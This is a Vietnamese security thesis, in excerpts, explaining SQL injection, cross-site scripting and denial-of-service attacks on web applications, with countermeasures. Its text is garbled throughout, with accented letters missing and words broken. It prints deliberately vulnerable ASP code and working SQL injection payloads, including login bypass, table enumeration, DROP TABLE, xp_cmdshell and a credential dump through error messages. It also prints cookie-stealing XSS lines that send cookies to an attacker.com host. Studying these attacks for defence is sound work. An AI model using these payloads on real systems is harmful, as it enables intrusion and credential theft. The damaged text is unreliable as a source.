n Tt Nghip c cc k thut, cc th thut tn cng web khi Hacker tn cng vo H thng Honeynet ca chng ta. Qua , chng ta a ra cc bin php phng chng, bo v cho dch v web. Cc k thut tn cng c bn. Cc nguy c mt an ton dch v web Di y l gii thiu s lc cc nguy c mt an ton, cc k thut tn cng Web c phn loi da trn mc gy tc hi i vi ng dng, vi ngi dng. Chim hu phin lm vic (Session Mangement) K thut ny c chia lm hai loi : 1.1.1.1. n nh phin lm vic( Session Fixation) L k thut tn cng cho php hacker mo danh ngi dng hp l bng cch gi mt session ID hp l n ngi dng, sau khi ngi dng ng nhp vo h thng thnh cng, hacker s dng li session ID v nghim nhin tr thnh ngi dng hp l. 1.1.1.2. nh cp phin lm vic (Session Hijacking) L k thut tn cng cho php hacker mo danh ngi dng hp l sau khi nn nhn ng nhp vo h thng bng cch gii m session ID ca h c lu tr trong cookie hay tham s URL, bin n ca form. Li dng vic thiu st trong vic kim tra d liu nhp hp l (Input validation) Hacker li dng nhng nhp d liu gi i mt on m bt k khin cho h thng phi thc thi on lnh hay b ph v hon ton. 1.1.1.3. Kim tra tnh ng n ca d liu bng ngn ng pha trnh duyt (Client-Side validation) Do ngn ng pha trnh duyt ( JavaScript, VBScript..) uc thc thi trn trnh duyt nn hacker c th sa i m ngun c th v hiu ha s kim tra. 1.1.1.4. Trn b m (Buffer OverFlow) Mt khi lng d liu c gi cho ng dng vt qu lng d liu c cp pht khin cho ng dng khng thc thi c cu lnh d nh k tip m thay vo phi thc thi mt on m bt k do hacker a vo h thng. Nghim trng hn nu ng dng c cu hnh thc thi vi quyn root trn h thng.
45 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip 1.1.1.5. Vt qua ng dn (Path Traversal) L phng php li dng ng dn truy xut mt tp tin trn URL tr kt qu v cho trnh duyt m hacker c th ly c ni dung tp tin bt k trn h thng. 1.1.1.6. Chn m lnh thc thi trn trnh duyt nn nhn (Cross- Site Scripting) y l k thut tn cng ch yu nhm vo thng tin trn my tnh ca ngi dng hn l vo h thng my ch. Bng cch thm mt on m bt k ( thng c lp trnh bng ngn ng kch bn nh JavaScript, VBScript), hacker c th thc hin vic nh cp thng tin quan trng nh cookie t tr thnh ngi dng hp l ca ng dngda trn nhng thng tin nh cp ny. Cross-Site scripting cng l mt kiu tn cng session hijacking. 1.1.1.7. Chn cu truy vn SQL (SQL Injection) Trong lp trnh vi c s d liu, ngi lp trnh sai st trong vn kim tra gi tr nhp vo t hacker li dng thm vo nhng cu truy vn hay nhng gi tr khng hp l d dng ng nhp vo h thng. T Chi Dch V (Denial of service (DoS) Mt khi lng ln yu cu c gi cho ng dng trong mt khong thi gian nht nh khin h thng khng p ng kp yu cu dn n h thng b ph v. V khun kh v thi gian ca n l c hn nn n ch thc hin tm hiu mt s k thut tn ph bin v c kh nng ph hoi mt h thng mng vi mc cao. V trong cc chng phn th hai, lun vn s trnh by k hn tng k thut sau :

Tn cng SQL Injection Tn cng T chi dch v (DoS)

Tn cng Cross-site Scripting (XSS)

Tn cng SQL Injection Khi nim SQL Injection Khi trin khai cc ng dng web trn internet, nhiu ngi vn ngh rng vic m bo an ton, bo mt nhm gim thiu ti a kh nng b tn cng bi cc tin tc ch n thun tp trung vo cc vn nh chn h iu hnh, h qun tr c s d liu, webserver chy ng dng m qun mt rng ngay c bn thn ng dng chy trn cng tim n l hng bo mt rt ln. Mt trong cc l hng ny l SQL Injection. Ti
46 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Vit Nam, qua thi k cc qun tr website l l vic qut virus, cp nht cc bn v li t cc phn mm h thng nhng vic chm sc cc li ca cc ng dng li rt t c quan tm. l l do v sao trong thi gian va qua, khng t cc website ti Vit Nam b tn cng v a s u l SQL Injection. Vy SQL Injection l g? SQL injection l mt k thut cho php nhng k tn cng ( Hacker) li dng l hng trong vic kim tra d liu nhp trong cc ng dng web v cc thng bo li ca h qun tr c s d liu "tim vo" v thi hnh cc cu lnh SQL bt hp php (khng c ngi pht trin ng dng lng trc). Hu qu ca n rt tai hi cho php nhng k tn cng chim quyn kim sot web. Li ny thng xy ra trn cc ng dng web c d liu c qun l bng cc h qun tr c s d liu nh SQL Server, MySQL, Oracle, DB2, Sysbase. V bn cht, y l li tn ti trong Cc h qun tr c s d liu ( SQL server, MySQL, Oraccle .). Tuy nhin, chng ta c th khc phc li ny bng cch kim tra d liu c nhp vo trn ng dng Web. Cc dng tn cng thng gp 1.1.1.8. Dng tn cng vt qua kim tra ng nhp Vi dng tn cng ny, tin tc c th d dng vt qua cc trang ng nhp nh vo li khi dng cc cu lnh SQL thao tc trn c s d liu ca ng dng web.Xt mt v d in hnh, thng thng cho php ngi dng truy cp vo cc trang web c bo mt, h thng thng xy dng trang ng nhp yu cu ngi dng nhp thng tin v tn ng nhp v mt khu. Sau khi ngi dng nhp thng tin vo, h thng s kim tra tn ng nhp v mt khu c hp l hay khng quyt nh cho php hay t chi thc hin tip. Trong trng hp ny, ngi ta c th dng hai trang, mt trang HTML hin th form nhp liu v mt trang ASP dng x l thng tin nhp t pha ngi dng. V d: login.htm <form action="ExecLogin.asp" method="post"> Username: <input type="text" name="fUSRNAME"><br> Password: <input type="password" name="fPASSWORD"><br>
47 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip <input type="submit"> </form> execlogin.asp <% Dim vUsrName, vPassword, objRS, strSQL vUsrName = Request.Form("fUSRNAME") vPassword = Request.Form("fPASSWORD") strSQL = "SELECT * FROM T_USERS " & _"WHERE USR_NAME=' " & vUsrName & _ " ' and USR_PASSWORD=' " & vPassword & " ' " Set objRS = Server.CreateObject("ADODB.Recordset") objRS.Open strSQL, "DSN=..." If (objRS.EOF) Then Response.Write "Invalid login." Else Response.Write "You are logged in as " & objRS("USR_NAME") End If Set objRS = Nothing %> Thot nhn, on m trong trang execlogin.asp dng nh khng cha bt c mt l hng v an ton no. Ngi dng khng th ng nhp m khng c tn ng nhp v mt khu hp l. Tuy nhin, on m ny thc s khng an ton v l tin cho mt li SQL injection. c bit, ch s h nm ch d liu nhp vo t ngi dng c dng xy dng trc tip cu lnh SQL. Chnh iu ny cho php nhng k tn cng c th iu khin cu truy vn s c thc hin. V d: nu ngi dng nhp chui sau vo trong c 2 nhp liu username/password ca trang login.htm l: ' OR ' ' = ' '. Lc ny, cu truy vn s c gi thc hin l:
48 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip SELECT * FROM T_USERS WHERE USR_NAME ='' OR ''='' and USR_PASSWORD= '' OR ''='' Cu lnh so snh trn lun lun ng (v lun bng ). Do cu iu kin trong mnh WHERE lun ng. Gi tr tn ngi s dng ca dng u tin trong bng s c chn.Nh vy, cu truy vn ny l hp l v s tr v tt c cc bn ghi ca T_USERS v on m tip theo x l ngi dng ng nhp bt hp php ny nh l ngi dng ng nhp hp l. Ngoi ra, trong chui SQL-injection c tim vo thng cha cha cc k t c bit ca SQL :

k t ; : nh du kt thc 1 cu truy vn k t -- : n chui k t pha sau n trn cng 1 dng

Mt v d khc s dng k t c bit SQL thm nhp vo h thng nh sau: Username: admin-Password: Cu lnh SQL nh sau: SELECT tkUsername FROM User WHERE tkUsername= admin-- AND Password= & tkPassword & Ta thy, cu lnh trn cho php ng nhp vo h thng vi quyn admin m khng i hi password ( V phn sau ca du -- s b n khng c thc thi). Tm li, tn cng vt qua kim tra ng nhp l dng tn cng c bn nht gip Hacker vt qua cc trang ng nhp nh vo li khi dng cc cu lnh SQL thao tc trn c s d liu ca ng dng web. 1.1.1.9. Dng tn cng s dng cu lnh SELECT Dng tn cng ny phc tp hn. thc hin c kiu tn cng ny, k tn cng phi c kh nng hiu v li dng cc s h trong cc thng bo li t h thng d tm cc im yu khi u cho vic tn cng.Xt mt v d rt thng gp trong cc website v tin tc. Thng thng, s c mt trang nhn ID ca tin cn hin th ri sau truy vn ni dung ca tin c ID ny. V d: http://www.victim.com/shownews.asp?ID=123. M ngun cho chc nng ny thng c vit kh n gin theo dng sau :
49 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip <% Dim vNewsID, objRS, strSQL vNewsID = Request("ID") strSQL = "SELECT * FROM T_NEWS WHERE NEWS_ID =" & vNewsID Set objRS = Server.CreateObject("ADODB.Recordset") objRS.Open strSQL, "DSN=..." Set objRS = Nothing %> Trong cc tnh hung thng thng, on m ny hin th ni dung ca tin c ID trng vi ID ch nh v hu nh khng thy c li. Tuy nhin, ging nh v d ng nhp trc, on m ny l s h cho mt li SQL injection khc. K tn cng c th thay th mt ID hp l bng cch gn ID cho mt gi tr khc, v t , khi u cho mt cuc tn cng bt hp php, v d nh: 0 OR 1=1 (ngha l, http://www.victim.com/shownews.asp?ID=0 or 1=1). Cu truy vn SQL lc ny s tr v tt c cc article t bng d liu v n s thc hin cu lnh: SELECT * FROM T_NEWS WHERE NEWS_ID=0 or 1=1 Mt trng hp khc, v d nh trang tm kim. Trang ny cho php ngi dng nhp vo cc thng tin tm kim nh H, Tn, on m thng gp l: <% Dim vAuthorName, objRS, strSQL vAuthorName = Request("fAUTHOR_NAME") strSQL = "SELECT * FROM T_AUTHORS WHERE AUTHOR_NAME =' " & _vAuthorName & " ' " Set objRS = Server.CreateObject("ADODB.Recordset") objRS.Open strSQL, "DSN=..." ............. Set objRS = Nothing %>
50 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Tng t nh trn, tin tc c th li dng s h trong cu truy vn SQL nhp vo trng tn tc gi bng chui gi tr:
' UNION SELECT ALL SELECT OtherField FROM OtherTable WHERE ' '=' (*)

Lc ny, ngoi cu truy vn u khng thnh cng, chng trnh s thc hin thm lnh tip theo sau t kha UNION na. Tt nhin cc v d ni trn, dng nh khng c g nguy him, nhng hy th tng tng k tn cng c th xa ton b c s d liu bng cch chn vo cc on lnh nguy him nh lnh DROP TABLE. V d nh: ' DROP TABLE T_AUTHORS Nh vy bit c ng dng web c b li dng ny hay khng ? Rt n gin, hy nhp vo chui (*) nh trn, nu h thng bo li v c php dng: Invalid object name OtherTable; ta c th bit chc l h thng thc hin cu SELECT sau t kha UNION, v nh vy mi c th tr v li m ta c tnh to ra trong cu lnh SELECT. V ta cng c th bit c tn ca cc bng d liu m thc hin cc thao tc ph hoi khi ng dng web b li SQL injection. Cng rt n gin, bi v trong SQL Server, c hai i tng l sysobjects v syscolumns cho php lit k tt c cc tn bng v ct c trong h thng. Ta ch cn chnh li cu lnh SELECT, v d nh: ' UNION SELECT name FROM sysobjects WHERE xtype = 'U' l c th lit k c tn tt c cc bng d liu. 1.1.1.10. Dng tn cng s dng cu lnh INSERT Thng thng cc ng dng web cho php ngi dng ng k mt ti khon tham gia. Chc nng khng th thiu l sau khi ng k thnh cng, ngi dng c th xem v hiu chnh thng tin ca mnh. SQL injection c th c dng khi h thng khng kim tra tnh hp l ca thng tin nhp vo. V d, mt cu lnh INSERT c th c c php dng: INSERT INTO TableName VALUES('Value One', 'Value Two', 'Value Three'). Nu on m xy dng cu lnh SQL c dng : <% strSQL = "INSERT INTO TableName VALUES(' " & strValueOne & " ', ' " &
51 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip strValueTwo & " ', ' " & strValueThree & " ') " Set objRS = Server.CreateObject("ADODB.Recordset") objRS.Open strSQL, "DSN=..." ................. Set objRS = Nothing %> Ta thy, on code trn b li SQL injection, bi v nu ta nhp vo trng th nht v d nh: ' + (SELECT TOP 1 FieldName FROM TableName) + '. Lc ny cu truy vn s l: INSERT INTO TableName VALUES(' ' + (SELECT TOP 1 FieldName FROM TableName) + ' ', 'abc', 'def'). Khi , lc thc hin lnh xem thng tin, xem nh ta yu cu thc hin thm mt lnh na l: SELECT TOP 1 FieldName FROM TableName 1.1.1.11. Dng tn cng s dng stored-procedures Stored Procedure c s dng trong lp trnh Web vi mc ch gim s phc tp trong ng dng v trnh s tn cng trong k thut SQL Injection. Tuy nhin hacker vn c th li dng nhng Stored Procedure tn cng vo h thng.Vic tn cng bng stored-procedures s gy tc hi rt ln nu ng dng c thc thi vi quyn qun tr h thng 'sa'. V d, nu ta thay on m tim vo dng: ' ; EXEC xp_cmdshell cmd.exe dir C: '. Lc ny, h thng s thc hin lnh lit k th mc trn a C:\ ci t server. Vic ph hoi kiu no tu thuc vo cu lnh ng sau cmd.exe. 1.1.1.12. Tn cng da vo cu lnh HAVING, GROUP BY, UNION Lnh SELECT c dng ly thng tin t c s d liu. Thng thng v tr c th c chn thm vo mt mnh SELECT l sau WHERE. c th tr v nhiu dng thng tin trong bng, thay i iu kin trong mnh WHERE bng cch chn thm UNION SELECT. V d : StrSQL=SELECT tkUsername FROM User WHERE tkUsername like
52 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip % & tName & UNION SELECT tkPassword from User Cu lnh trn tr v mt tp kt qu l s tkPassword trong bng User. Ch : S ct trong hai cu SELECT phi khp vi nhau. Ngha l s lng ct trong cu lnh SELECT ban u v cu lnh UNION SELECT pha sau bng nhau v cng kiu.Nh vo li c php tr v sau khi chn thm cu lnh UNION m c th bit kiu ca mi trng. Sau y l v d qa trnh tn cng ca tin tc khai thc ni dung c s d liu da vo HAVING, GROUP BY, UNION: Cu truy vn cn ng nhp : SQL Query=SELECT tkUsername,tkPassword FROM User WHERE tkUsername= & strUsername & AND Password= & tkPassword & u tin, bit tn bng v tn trng m cu truy vn s dng, s dng cu iu kin having , nh v d sau: Gi tr nhp vo: Username: having 1=1 Li pht sinh: [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'User.tkUsername' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. Nh vo li pht sinh ny m bit c bng s dng trong cu truy vn l User v trong bng tn ti mt trng tn l tkUsername. Sau s dng GROUP BY: Username: group by User.tkUsername having 1=1 Li pht sinh: [Microsoft][ODBC SQL Server Driver][SQL Server] Column'User.tkPassword' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. Nh vy, tkPassword l mt trng ca bng User v c s dng trong cu truy vn.Tip tc dng GROUP BY cho n khi bit c tt c cc trng trong bng User
53 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

kt hp gia tkUsername vi

n Tt Nghip tham gia vo cu truy vn.n khi khng cn bo li c php GROUP BY na th chuyn qua cng on kim tra kiu ca tng trng trong bng. Lc ny UNION c s dng: Username:union select sum(tkUsername) from User Lnh sum l lnh tnh tng cho i s bn trong du ngoc. i s phi l kiu s. Nu i s khng l kiu s th pht sinh li nh sau: [Microsoft][ODBC SQL Server Driver][SQL Server] The sum or average aggregate operation cannot take a varchar data type as an argument. Nh vy, vi thng ip li nh trn th tkUsername chc chn phi l kiu varchar. Vi phng php trn, d dng xc nh c kiu ca tng trng trong bng. Sau khi nhn y trng tin trn th hacker d dng t thm thng tin vo bng User. Username: insert into User(tkUsername,tkPassword) values (admin, ) Nh vy, by gi tin tc chn c Account admin m khng cn mt khu, v c th dng Account ny ng nhp. Tuy nhin, ty thuc vo mc bo mt ca Website m lc ny tin tc c th ot c quyn qun tr Website hay khng. Ngoi ra, k tn cng cn c th tin hnh cc bc sau khai thc thng tin ca bng User, c th nh ly thng tin v username/pasword c sn trong bng ny : Bc 1: To mt Stored procedure chp vo tt c thng tin ca 2 trng tkUsername v tkPassword trong bng User thnh mt chui vo mt bng mi l foo c mt trng l ret bng on m sau: create proc test as begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+tkUsername+'/'+tkPassword from User select @ret as ret into foo end Thc thi cu lnh bng cch nhp vo form:
54 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Username:; create proc test as begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+tkUsername+'/'+tkPassword from User select @ret as ret into foo Bc 2: Gi Stored procedure : Sau khi to c stored procedure nh trn, thc hin li gi hm: Username:;exec test Bc 3: Dng UNION xem ni dung bng foo : Username:;select ret,1 from foo union select 1,1 from foo Sau khi thc hin lnh ny th s xut hin li pht sinh: Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft] [ODBCSQL Server Driver][SQL Server] error convertingthe varchar value ': admin /passof map/nhimmap minhthu/kmathu' to a column of data type int. Qua mt s cng on, hacker thu c ni dung ca bng User gm c tn tkUsername v mt khu tkPassword. Bc 4: Ngoi ra hacker cn c th cn thn xo bng foo xo du vt: Username: ; drop table foo Ngoi ra, cn mt cch khc xc nh ni dung thng tin ca bng User nh sau: Bc 1: Tm tun t tng dng trn bng User Username:union select 1,1 hoc : Username:union select min(tkUsername),1 from User where tkUsername> a Li pht sinh: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft] [ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin' to a column of data type int. Ta bit c mt Account trong bng User l admin. Bc 2: bit cc gi tr tip theo, nhp chui sau:
55 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Username:;select min(tkUsername),1 from User where tkUsername> adminunion select 1,1 from User Li pht sinh: Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft] [ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' map ' to a column of data type int. Ta tip tc thu c thng tin v Account map. Bc 3: Thc hin nh tkUsername trong bng User Bc 4: bit thm v tkPasswork, c th thc hin nh sau: Username:;select tkPassword,1 from User where tkUsername=adminunion select 1,1 from User Li pht sinh: Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft] [ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' assOf' to a column of data type int. bit thng tin v cc bng, ct trong c s d liu, c th truy vn bng n bng h thng INFORMATION_SCHEMA.TABLES. SELECT TABLE_NAME from INFORMATION_SCHEMA.TABLES INFORMATION_SCHEMA.TABLES cha thng tin v tt c cc table c trn server. Trng TABLE_NAME cha tn ca mi table trong c s d liu. SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='User' Cu lnh trn c s dng bit thng tin v ct trong bng User. Tm li, trn y l nhng k thut m tin tc thng s dng da vo cu lnh HAVING, GROUP BY, UNION khai thc thng tin t c s d liu trong qu trnh tn cng ca mnh. Bin php phng chng Di y l mt s bin php phng chng SQL-injection: 1.1.1.13. Kim tra d liu
56 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

bc 2 cho ra kt qu l tng dng vi trng

n Tt Nghip Kim tra tnh ng n ca d liu l 1 vn phc tp v thng cha c quan tm ng mc trong cc ng dng. Khuynh hng ca vic kim tra tnh ng n ca d liu khng phi l ch cn thm mt s chc nng vo ng dng, m phi kim tra mt cch tng qut nhanh chng t c mc ch. V d nu c b lc : Lc b nhng d liu bt hp l nh --,select v union Mt hm kim sot loi b du nhy n th c th i ph nh sau. Mt s cch ci t cc chc nng kim tra d liu c bn Cch 1: Thay th du nhy n: function escape( input ) input = replace(input, "'", "''") escape = input end function Cch 2: T chi d liu bt hp l function validate_string( input ) known_bad = array("select","insert","update", "delete", "drop","--", "'" ) validate_string = true for i = lbound( known_bad ) to ubound( known_bad ) if ( instr( 1, input, known_bad(i), vbtextcompare )<> 0 ) then validate_string = false exit function end if next end function Cch 3: Ch chp nhn d liu hp l function validatepassword( input ) good_password_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNO PQRSTUVWXYZ0123456789" validatepassword = true
57 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip for i = 1 to len( input ) c = mid( input, i, 1 ) if ( InStr( good_password_chars, c ) = 0 ) then validatepassword = false exit function end if next end function 1.1.1.14. Kho cht SQL Server (SQL Server Lockdown) y l mt danh sch cc cng vic cn lm bo v SQL server: * Xc nh cc phng php kt ni n server: * Dng tin ch Network Utility kim tra rng ch c cc th vin mng ang dng l hoat ng. * Kim tra tt c cc ti khon c trong SQL Server * Ch to ti khon c quyn thp cho cc ng dng * Loi b nhng ti khon khng cn thit * m bo rng tt c ti khon c mt mt khu hp l, * Kim tra cc i tng tn ti * Nhiu extended stored procedure c th c xo b mt cch an ton.Nu iu ny c thc hin, th cng nn xem xt vic loi b lun nhng tp tin .dll cha m ca cc extended stored procedure * Xo b tt c c s d liu mu nh northwind v pubs * Xa cc stored procedure khng dng nh: master..xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask * Kim tra nhng ti khon no c th truy xut n nhng i tng no * i vi nhng ti khon ca mt ng dng no dng truy xut c s d liu th ch c cp nhng quyn hn cn thit ti thiu truy xut n nhng i tng n cn dng. * Kim tra lp sa cha ca server : C mt s cch tn cng nh buffer overflow, format string thng ch n lp bo v ny.
58 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip * Kim tra cc phin lm vic trn server * Thay i "Startup v chy SQL Server" mc ngi dng quyn hn thp trong SQL Server Security. 1.1.1.15. S dng phng php m ha d liu y l mt phng php rt hu hiu bo v an ton thng tin ni chung v bo v thng tin ca C s d liu ca Web, gip ngn chn v gim thiu thit hi sy ra ngay c khi Hacker chim c quyn kim sot website do thng tin trong C s d liu c m ha. Mt v d minh chng cho sc mnh ca bin php ny l: trong phn trnh by cc k thut tn cng SQL-injection trn, ta thy Hacker c bc tim cc cu lnh SQL nhm khai thc thng tin username v pasword ca ti khon admin t cc thng bo li. R rng l nu gi s bin php m ha c s dng y th lc ny Hacker ch ly c gi tr thng tin ca khon admin c m ha (thng thng y l cc gi tr c m ha qua mt hm bm). Nh vy, Hacker s rt khn trong vic tm li gi tr thng tin username v passowrd tht ca ti khon admin, v Hacker s phi b cuc. Hin nay, c nhiu H qun tr C s d liu c h tr m ha nh : SQL server 2005, Oracle, MySQL ,, nhng c mnh hn c l Oracle v rt hay c s dng trong cc ngn hng, cng ty ti chnh, chng khon.. Nhn xt: - Qua y, ta cng thy rng s cn thit - quan trng ca vic kim tra d liu trc khi x l. - ng dng ngoi vic kim tra tnh ng n ca d liu, cn m ha d liu ngay bn trong c s d liu v khng cho xut trang Web li, bo ni dung li c php SQL hacker khng th thu thp thng tin c s d liu. - Bn cnh l thc an ninh mng ca ngi qun tr mng. Chn m lnh thc thi trn trnh duyt nn nhn(Cross-Site Scripting). Gii thiu v XSS Phng php Cross Site Scripting (c vit tt l XSS) l phng php tn cng bng cch chn thm nhng on m c kh nng nh cp hay thit lp c nhng thng tin quan trng nh cookies, mt khu, vo m ngun ng dng web t
59 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip chng c chy nh l mt phn ca ng dng Web v c chc nng cung cp hoc thc hin nhng nhng iu hacker mun. Cross-Site Scripting (XSS) l mt trong nhng k thut tn cng ph bin nht hin nay, ng thi n cng l mt trong nhng vn bo mt quan trng i vi cc nh pht trin web v c nhng ngi s dng web. Bt k mt website no cho php ngi s dng ng thng tin m khng c s kim tra cht ch cc on m nguy him th u c th tim n cc li XSS. Cross-Site Scripting (thay v gi tt l CSS trnh nhm ln vi CSS-Cascading Style Sheet ca HTML) l mt k thut tn cng bng cch chn vo cc website ng (ASP, PHP, CGI, JSP ...) nhng th HTML hay nhng on m script nguy him c th gy nguy hi cho nhng ngi s dng khc. Trong , nhng on m nguy him c chn vo hu ht c vit bng cc Client-Site Script nh JavaScript, JScript, DHTML v cng c th l c cc th HTML.K thut tn cng XSS nhanh chng tr thnh mt trong nhng li ph bin nht ca Web Applications v mi e do ca chng i vi ngi s dng ngy cng ln. Ngi chin thng trong cuc thi eWeek OpenHack 2002 l ngi tm ra 2 XSS mi. Phi chng mi nguy him t XSS ngy cng c mi ngi ch hn. V d: http://www.ibm.com/developerworks/tivoli/library/s-csscript/ Phng php tn cng XSS truyn thng ng dng Web thng lu tr thng tin quan trng cookie. Cookie l mu thng tin m ng dng lu trn a cng ca ngi s dng. Nhng ch ng dng thit lp ra cookie th mi c th c n. Do ch khi ngi dng ang trong phin lm vic ca ng dng th hacker mi c c hi nh cp cookie. Cng vic u tin ca hacker l tm trang ch d ngi dng ng nhp sau khi tm ra l hng trn ng dng . Cc bc thc hin XSS truyn thng Tm tt cc bc thc hin: Bc 1: Hacker bit c ngi dng ang s hng XSS. Bc 2: Ngi dng nhn c 1 lin kt thng qua email hay trn chnh trang Web (nh trn guestbook, banner d dng thm 1 lin kt do chnh hacker to ra).
60 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

dng mt ng dng Web c l

n Tt Nghip Thng thng hacker khin ngi dng ch bng nhng cu kch thch s t m ca ngi dng nh Kim tra ti khon, Mt phn thng hp dn ang ch bn Bc 3: Chuyn ni dung thng tin (cookie, tn, mt khu) v my ch ca hacker. Bc 4: Hacker to mt chng trnh cgi ( v d 3 ny l steal.cgi) hoc mt trang Web ghi nhn nhng thng tin nh cp vo 1 tp tin Bc 5: Sau khi nhn c thng tin cn thit, hacker c th s dng thm nhp vo ti khon ca ngi dng. V d : khai thc l hng trn ng dng hotwired.lycos.com, hacker c th thc hin nh sau : <html> <head> <title>Look at this!</title> </head> <body> <a href="http://hotwired.lycos.com/webmonkey/index1.html? tw=<script>document.location.replace('http://www.attacker.com/steal.cgi?'+docu ment.cookie);</script>"Mt phn thng hp dn ang ch bn </a> </body> </html> Sau khi ngi dng nhp vo lin kt Mt phn thng hp dn ang ch bn, cookie trn my nn nhn s b nh cp v l tham s truyn vo cho chng trnh steal.cgi ca hacker. http://www.attacker.com/steal.cgi? lubid=010000508BD3046103F43B8264530098C20100000000;%20p_uniqid=8sJgk9daas 7WUMxV0B;%20gv_titan_20=5901=1019511286 Tn cng XSS bng Flash Ngoi nhng cch a mt on m nguy him th hacker cn c th li dng
61 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip nhng tp tin flash nh cp thng tin. Macromedia Flash cho php lp trnh bng mt ngn ng kch bn c xy dng sn trong Flash l ActionScript. ActionScript c c php n gin v tng t nh JavaScript , C hay PERL. V d hm getURL() dng gi mt trang web khc, tham s thng l mt URL chng hn nh http://www.yahoo.com. getURL(http://www.yahoo.com) Tuy nhin c th thay th URL bng JavaScript: getURL(javascript:alert(document.cookie)) V d trn s lm xut hin bng thng bo cha cookie ca trang web cha tp tin flash . Nh vy l trang web b tn cng, bng cch chn mt on JavaScript vo ng dng Web thng qua tp tin flash. Mt v d khc r hn v cch tn cng ny l: y l on lnh trong tp tin flash v s c thi hnh khi tp tin flash c c: getURL(javascript:location(http://www.attacker.com? newcookie=+document.cookie)) Nh vy l khi ngi dng xem trang web cha tp tin flash ny th ngay lp tc cookie ca h do trang web cha tp tin flash to ra s gi v cho hacker. Cch phng chng Nh cp trn, mt tn cng XSS ch thc hin c khi gi mt trang web cho trnh duyt web ca nn nhn c km theo m script c ca k tn cng. V vy nhng ngi pht trin web c th bo v website ca mnh khi b li dng thng qua nhng tn cng XSS ny, m bo nhng trang pht sinh ng khng cha cc tag ca script bng cch lc v xc nhn hp l cc d liu u vo t pha ngi dng hoc m ha(endcoding) v lc cc gi tr xut cho ngi dng. Vi nhng d liu, thng tin nhp ca ngi dng, ngi thit k ng dng Web cn phi thc hin vi bc c bn sau: * To ra danh sch nhng th HTML c php s dng. * Xa b th <script> * Lc ra bt k mt on m JavaScript/Java/VBScript/ActiveX/Flash Related no. * Lc du nhy n hay kp.
62 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip * Lc k t Null ( v kh nng thm mt on m bt k sau k t Null khin cho ng dng d lc b th <script> vn khng nhn ra do ng dng ngh rng chui kt thc t k t Null ny). * Xa nhng k t > , < * Vn cho php nhp nhng k t c bit nhng s c m ha theo chun ring. * i vi ngi dng, cn cu hnh li trnh duyt nhc nh ngi dng c cho thc thi ngn ng kch bn trn my ca h hay khng? Ty vo mc tin cy m ngi dng s quyt nh. Nhn xt: K thut XSS kh ph bin v d dng p dng, tuy nhin mc thit hi ch dng li mc tn cng trn my nn nhn thng qua nhng lin kt hay form la o m hacker a n cho nn nhn. V th, ngoi vic ng dng kim tra tnh ng n ca d liu trc khi s dng th vic cn nht l ngi dng nn cnh gic trc khi bc vo mt trang Web mi. C th ni, nh vo s cnh gic ca ngi dng th 90% t c s bo mt trong k thut ny. Tuy nhin, trong chng 6, s tn cng li nhm vo my ch, nhm thu thp thng tin trong c s d liu v t ginh quyn qun tr ng dng. Tn cng t chi dch v (Deny of service - DoS) Khi nim DoS (Denial of Service) c th m t nh hnh ng ngn cn nhng ngi dng hp php ca mt dch v no truy cp v s dng dch v . N bao gm c vic lm trn ngp mng, lm mt kt ni vi dch v m mc ch cui cng l lm cho server khng th p ng c cc yu cu s dng dch v t cc client. DoS c th lm ngng hot ng ca mt my tnh, mt mng ni b, thm ch c mt h thng mng rt ln. Thc cht ca DoS l k tn cng s chim dng mt lng ln ti nguyn mng nh bng thng, b nh v lm mt kh nng x l cc yu cu dch v n t cc client khc. V d vi giao thc l ICMP, hacker c th s dng bomb e-mail gi hng ngn thng ip email vi mc ch tiu th bng thng lm hao ht ti nguyn h thng trn mail server. Hoc c th dng phn mm gi hng lot yu cu n my
63 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

